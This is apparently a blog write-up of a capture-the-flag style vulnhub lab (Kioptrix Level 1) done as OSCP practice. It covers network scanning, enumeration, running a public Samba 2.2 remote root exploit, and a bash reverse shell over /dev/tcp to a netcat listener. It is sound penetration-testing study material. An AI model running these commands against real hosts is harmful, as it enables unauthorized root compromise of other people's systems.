My OSCP exam is fast approaching. For extra practice I am going to start working through the relevant vulnhub machines.
A list of vulnhub machines that are more like OSCP here.
Starting right at the beginning with: Kioptrix Level 1
I used the free vmware workstation edition and created a new private network. I moved my Kali machine and Kioptrix into that network. (I also have a basic DHCP/DNS server in there).
Starting with a scan to find the machine:
netdiscover -r 10.0.0.0/24
Nmap scan of our discovered target:
nmap -p- -sV -sS -T4 -A 10.0.0.51
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
1024/tcp open status 1 (RPC #100024)
We seem to have:
Open SSH 2.9
HTTP & HTTPS
RPC & SMB (via Samba)
Starting a quick scan of the HTTP and SMB ports via dirb and enum4linux to build out the list of possible attack surfaces:
The most interesting thing in the scan is the version of Samba.
The latest on the Samba site is 4.7.0. The version on this server is 2.2.1a which looks really old. Looking at the Samba site, this version was from 2001 and was designed with Windows 2000 enhancements in mind.
Quick manual check of the interesting pages:
At this point we have a handful of attack surfaces to explore:
- Old Samba (2.2.1)
- Old’ish Apache (Apache httpd 1.3.20)
- Webalizer 2.01
The really old samba is particularly interesting, starting there:
searchsploit samba 2.2
Remote root exploit sounds perfect, inspecting the code to see if there is manual work to do. It seems to be ready to do.
Compiled with: gcc 10.c -o sambaexploit
Execute with: ./sambaexploit -b 0 -v 10.0.0.51
It seems to have worked. We dont have an interactive shell (tried an ls command), but we appear to be able to execute commands.
Set up a local listener: nc -nlvp 443
Execute reverse shell via the exploit prompt: bash -i >& /dev/tcp/10.0.0.50/443 0>&1
Success – interactive reverse shell (as root):